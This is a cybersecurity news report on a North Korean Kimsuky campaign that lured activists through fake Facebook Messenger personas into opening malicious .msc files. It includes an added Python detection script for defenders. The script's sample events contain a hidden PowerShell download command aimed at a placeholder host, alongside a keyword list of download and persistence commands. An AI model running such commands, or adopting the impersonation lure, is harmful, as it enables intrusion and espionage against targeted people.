    North Korean hackers exploit Facebook Messenger in targeted malware campaign


Report | May 16, 2024 | Editorial Department | Malware/cyber espionage


The North Korea-linked Kimsuky hacking group has been attributed with a new social engineering attack that uses fictitious Facebook accounts to approach targets via Messenger and ultimately deliver malware.

    “The threat actor created a Facebook account pretending to be a public official working in the human rights field in North Korea,” South Korean cybersecurity firm Genians said in a report released last week.

    The statement pointed out that this multi-stage attack campaign, impersonating legitimate individuals, was designed to target North Korean human rights and anti-North Korea activists.

    This approach differs from typical email-based spear phishing tactics by leveraging social media platforms to approach targets via Facebook Messenger and trick them into opening a seemingly private document written by the persona.


Hosted on OneDrive, the decoy document is a Microsoft Common Console document (.msc) disguised as an article or content related to the trilateral summit between Japan, South Korea and the United States – “My_Essay(prof).msc” or “NZZ_Interview_Kohei Yamamoto”.

    This raises the possibility that the campaign may be targeting specific groups of people in Japan and South Korea.

    The use of MSC files to carry out the attack indicates that Kimsuky is leveraging unusual document types to fly under the radar. To further increase the likelihood of a successful infection, the file is disguised as a harmless Word file using a word processor icon.

    If the victim launches the MSC file and agrees to open it using the Microsoft Management Console (MMC), a console screen containing a Word file is displayed, which upon launch initiates the attack sequence.

    This involves running commands to interact with a server controlled by an adversary (“brandwizer.co[.]in”) to display a document hosted on Google Drive (“Korea Forced Labor Claims Settlement Paper.docx”), while executing other instructions in the background to set persistence and collect battery and process information.


The collected information is then exfiltrated to a command-and-control (C2) server, which can also obtain the IP address, user-agent string and timestamp from the HTTP request and deliver the relevant payload as needed.
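The chain described above (an .msc file opened from a user-writable location, MMC then spawning commands that reach out to a remote server and set persistence) gives a defender two concrete things to look for in process-creation telemetry. The following is an added detection example, not code from Genians or from the article; the event field names (`image`, `parent_image`, `command_line`) and the sample events are constructed for illustration, and the remote host in the sample is a placeholder rather than the campaign's infrastructure.

```python
"""
Heuristic detection for MSC-based initial access, written as an added example.
Flags (a) mmc.exe launched with a .msc file from a user-writable path and
(b) mmc.exe acting as the parent of a shell or script interpreter, with a
further flag when that child's command line carries network or persistence
indicators. Field names are assumptions, not a specific product's schema.
"""
import re
from pathlib import PureWindowsPath
from typing import Dict, List, Tuple

# Locations an admin console is not normally double-clicked from (assumption).
USER_WRITABLE_HINTS = (
    "\\downloads\\", "\\temp\\", "\\appdata\\local\\temp\\", "\\desktop\\", "\\onedrive\\",
)
# Interpreters that a console snap-in should not ordinarily spawn.
SHELL_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
    "cscript.exe", "mshta.exe", "rundll32.exe",
}
# Simple command-line markers for download or persistence activity.
SUSPICIOUS_KEYWORDS = (
    "downloadstring", "invoke-webrequest", "curl ", "schtasks", "reg add",
)
# Quoted path (may contain spaces) or bare token ending in .msc.
MSC_ARG = re.compile(r'"([^"]+\.msc)"|(\S+\.msc)', re.IGNORECASE)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('' for an empty path)."""
    return PureWindowsPath(path).name.lower()


def analyze_event(ev: Dict[str, str]) -> List[str]:
    """Return a list of human-readable findings for one process-creation event."""
    findings: List[str] = []
    image = _basename(ev.get("image", ""))
    parent = _basename(ev.get("parent_image", ""))
    cmdline = ev.get("command_line", "")
    cl_lower = cmdline.lower()

    # (a) MMC opening a console file from a user-writable location.
    if image == "mmc.exe":
        m = MSC_ARG.search(cmdline)
        if m:
            msc_path = m.group(1) or m.group(2)
            if any(h in msc_path.lower() for h in USER_WRITABLE_HINTS):
                findings.append(f"mmc.exe opened .msc from user-writable path: {msc_path}")

    # (b) MMC spawning an interpreter, optionally with network/persistence markers.
    if parent == "mmc.exe" and image in SHELL_CHILDREN:
        findings.append(f"mmc.exe spawned {image}")
        if re.search(r"https?://", cl_lower) or any(k in cl_lower for k in SUSPICIOUS_KEYWORDS):
            findings.append("child command line contains network or persistence indicators")
    return findings


def scan_events(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Run analyze_event over a batch; returns (event index, finding) pairs."""
    return [(i, f) for i, ev in enumerate(events) for f in analyze_event(ev)]


# Constructed sample events (not real telemetry; host name is a placeholder).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\System32\mmc.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\mmc.exe" "C:\Users\alice\Downloads\My_Essay(prof).msc"'},
    {"image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\System32\mmc.exe",
     "command_line": r'cmd.exe /c powershell -w hidden -c "Invoke-WebRequest https://example.invalid/doc"'},
    {"image": r"C:\Windows\System32\mmc.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\mmc.exe" "C:\Windows\System32\eventvwr.msc"'},
    {"image": r"C:\Windows\System32\svchost.exe", "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for idx, finding in scan_events(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

The third sample (eventvwr.msc opened from System32) is deliberately benign and produces no finding, so the user-writable-path check is what separates a phished console file from everyday administrative use; tune `USER_WRITABLE_HINTS` and `SUSPICIOUS_KEYWORDS` to the environment before relying on the rule.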

    Genians said some of the tactics, techniques and procedures (TTPs) used in this campaign overlap with Kimsuky’s previous campaigns to spread malware such as ReconShark, which SentinelOne detailed in May 2023.

    “Spear phishing attacks were the most common APT attack method reported in South Korea during the first quarter of this year,” the company noted. “While less commonly reported, covert attacks via social media are also occurring.”

“Due to their one-to-one, personalized nature, they are not easily detected by security monitoring, and even if victims are aware of them, they are rarely reported externally. Therefore, it is important to detect these personalized threats at an early stage.”
